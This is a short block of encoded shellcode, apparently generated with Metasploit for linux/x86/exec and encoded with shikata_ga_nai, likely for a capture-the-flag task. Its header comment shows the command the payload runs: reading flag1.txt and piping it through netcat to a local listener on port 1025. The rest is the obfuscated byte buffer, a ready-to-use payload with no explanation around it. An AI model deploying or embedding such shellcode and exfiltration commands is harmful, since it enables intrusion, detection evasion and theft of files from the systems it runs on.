# linux/x86/exec - 101 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
# PrependSetreuid=false, PrependSetuid=false, 
# PrependSetresgid=false, PrependSetregid=false, 
# PrependSetgid=false, PrependChrootBreak=false, 
# AppendExit=false, MeterpreterDebugLevel=0, 
# RemoteMeterpreterDebugFile=, CMD=cat flag1.txt | nc -w 3 
# 127.0.0.1 1025
buf = 
"\xba\xb2\x44\xc0\xb5\xd9\xcb\xd9\x74\x24\xf4\x58\x31\xc9" +
"\xb1\x13\x83\xe8\xfc\x31\x50\x10\x03\x50\x10\x50\xb1\xaa" +
"\xbe\xcc\xa3\x79\xa7\x84\xfe\x1e\xae\xb3\x69\xce\xc3\x53" +
"\x6a\x78\x0b\xc1\x03\x16\xda\xe6\x86\x0e\xfb\xe8\x26\xcf" +
"\x67\x89\x52\xef\x01\x25\xfa\x88\xfc\x9b\x88\x2e\x8b\xc3" +
"\x0c\xef\x1d\x60\xcd\xc2\x96\x46\x3e\x3d\x68\xb4\x77\x13" +
"\xba\x96\x47\x45\x8b\xc6\x96\xa9\xd9\x33\xd9\x9e\x4e\xb2" +
"\x38\xed\xf1"
